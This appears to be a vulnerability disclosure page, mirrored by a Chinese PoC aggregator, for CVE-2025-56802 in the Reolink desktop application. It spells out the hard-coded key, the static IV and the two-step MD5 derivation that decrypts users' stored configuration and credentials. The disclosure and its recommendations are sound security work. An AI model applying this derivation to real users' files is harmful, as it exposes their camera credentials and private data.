POC详情: 7408e442d667a035ef4cafb2b3767cd88fb020d4

来源
https://github.com/shinyColumn/CVE-2025-56802
关联漏洞
标题: Reolink desktop application 安全漏洞 (CVE-2025-56802)
描述:Reolink desktop application是美国Reolink公司的一个安全摄像头监控软件。 Reolink desktop application存在安全漏洞,该漏洞源于使用硬编码和可预测的AES加密密钥加密用户配置文件,可能导致本地攻击者解密敏感数据。
描述
AES-CFB Key Generation and Management Vulnerability in Reolink Desktop Application
介绍
# CVE-2025-56802
### AES-CFB Key Generation and Management Vulnerability in Reolink Desktop Application
## 1. Overview

<img src="images/reolink-icon.png" alt="Reolink Icon" align="left" width="150" hspace="10"/>
<br clear="left"/>

- **Name**: Reolink Desktop Application
- **Version**: 8.18.12
- **Vendor**: Reolink
- **CWE**: [CWE-321: Use of Hard-coded Cryptographic Key](https://cwe.mitre.org/data/definitions/321.html), [CWE-522: Insufficiently Protected Credentials](https://cwe.mitre.org/data/definitions/522.html)
- **CVSS**: 
- **Vector String**: 
## 2. Summary
The Reolink Desktop Application (version 8.18.12) uses the AES-CFB algorithm to encrypt configuration files and other sensitive data.  

However, the encryption key is handled in an insecure manner, which allows attackers to easily decrypt the protected configuration data.

## 3. Details
The Reolink application stores user configuration and other sensitive information at the following path:
```
%APPDATA%\reolink\<UUID>.json
```
`<UUID>` has this format: `424e044d-aa27-4e59-873a-26b9f16be9ad`

This configuration file is encrypted using AES-CFB, and the AES key used for decryption is derived through the following process:
  1. Open the file located at the following path: 
     ```
     %APPDATA%\com.reolink.app.client
     ```
     The file contains data in JSON format, for example:
     ```
           {
      	"data": "+lWlitlpr9vBiG71RCJYoPSJKVnUgGVbgu4v9W6K3N0kzgLv9HEQpqVi2fMnHdb7iWhYgb5KeRhYb6IPVWRR4kxTcwTDfQmMOvFWLuqHPRJBt9ozPSo4TYDXzjBN0YAW",
      	"__internal__": {
      		"migrations": {
      			"version": "8.18.12"
      		}
      	}
      }
     ```
  2. The application uses `MD5("com.reolink.app").upper()` as the primary AES key, and `bcswebapp1234567` as the IV. The encrypted string (`data`) is base64-decoded and then decrypted. The decrypted string has this format: `59083200-3875-4f67-a067-d953286114a0`
     
  3. The final key is `MD5("<DECRYPTED_STRING>").upper().encode()`, and the IV remains the same (`bcswebapp1234567`). This is used to decrypt the configuration file, `<UUID>.json`.
     
## 4. Proof of Concept (PoC)
By executing [poc.py](poc.py), you can get the final key before it is MD5 hashed (in the format `59083200-3875-4f67-a067-d953286114a0`) and the contents of the configuration file.

## 5. Recommendations
A hash of a hard-coded static string, such as `com.reolink.app`, should not be used as the primary key.  

Additionally, keys should not be stored in a predictable local file, such as in `%APPDATA%`. Strong, validated secure keystores provided by the operating system, such as Windows DPAPI or macOS Keychain, must be used to protect all sensitive credentials.
## 6. References
文件快照

 [4.0K]  /data/pocs/7408e442d667a035ef4cafb2b3767cd88fb020d4
├── [4.0K]  images
│   └── [4.9K]  reolink-icon.png
├── [2.2K]  poc.py
└── [2.6K]  README.md

1 directory, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。